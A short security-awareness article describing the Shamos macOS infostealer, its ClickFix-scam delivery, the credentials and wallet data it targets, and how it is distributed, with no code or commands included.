Shamos Stealer
Shamos is a recently identified macOS malware specifically designed to compromise macOS devices. Active since at least the summer of 2025, this malware is operated as a Malware-as-a-Service (MaaS) offering by a group known as COOKIE SPIDER. Its primary delivery vector has been ClickFix scams, a technique increasingly popular among cybercriminals targeting macOS users. Shamos has been identified to be a variant of the AMOS (Atomic) Stealer mobile threat.
Table of Contents
Initial Infection Pathway
Shamos primarily infiltrates systems through ClickFix scams, which trick users into copying and pasting malicious commands into the Terminal. This action triggers the download of a Bash script that bypasses Gatekeeper checks, steals login credentials, and ultimately deploys a Mach-O file carrying Shamos. By exploiting user trust in troubleshooting advice, this method significantly increases infection rates.
Stealth and Data Harvesting
Once executed, Shamos employs anti-analysis mechanisms to detect whether it is running in a virtual machine or sandbox. If it determines the environment is genuine, it begins extensive data collection. The malware hunts for files tied to passwords, cryptocurrency wallets, and sensitive system data.
Key areas of interest include:
Keychain Access: Apple’s native password storage utility.
Notes App: Often misused by users for storing private details.
Web Browsers: A rich source of browsing histories, cookies, autofill entries, stored credentials, and payment details.
Expanding Beyond Data Theft
Shamos is not limited to credential harvesting. It has been observed downloading additional payloads, including:
- A botnet module for large-scale network exploitation.
- A fake Ledger Live wallet app, designed to trick cryptocurrency users.
Such capabilities make Shamos a gateway to broader infections, including ransomware, trojans, cryptominers, and other high-impact threats.
Geographic Targeting and Exclusions
Campaigns distributing Shamos have mainly targeted users in the United States, United Kingdom, Canada, China, Colombia, Italy, Japan, and Mexico. One notable exclusion is Russia, which aligns with the common practice of Russian-based MaaS operators avoiding local targets.
ClickFix Scams in Action
The cornerstone of Shamos campaigns lies in malvertising and SEO poisoning, which drive victims to fraudulent websites disguised as legitimate Mac support pages. These websites use authentic branding to build trust before instructing users to execute harmful commands.
Additionally, cybercriminals have used deceptive GitHub repositories, offering free downloads for popular Mac tools such as iTerm2, CAD software, video editors, AI tools, and optimization programs.
Other Possible Distribution Methods
While ClickFix scams remain the primary delivery mechanism, Shamos could also be spread through more traditional malware distribution techniques, including:
Phishing and Social Engineering: Malicious links or attachments via email, private messages, or direct messages.
Drive-By Downloads and Malvertising: Hidden payloads on compromised or malicious sites.
Suspicious Distribution Channels: Pirated software, cracks, third-party freeware, and P2P networks.
Fake Updates: Deceptive prompts urging users to install fake security or system updates.
Self-Proliferation: Some malware variants spread autonomously through local networks or external drives.
The Bottom Line
The presence of Shamos on a system can lead to severe privacy intrusions, identity theft, financial losses, and multiple infections through chained attacks. Its MaaS model ensures it will remain accessible to even low-skilled threat actors, making it a persistent danger to macOS users worldwide.
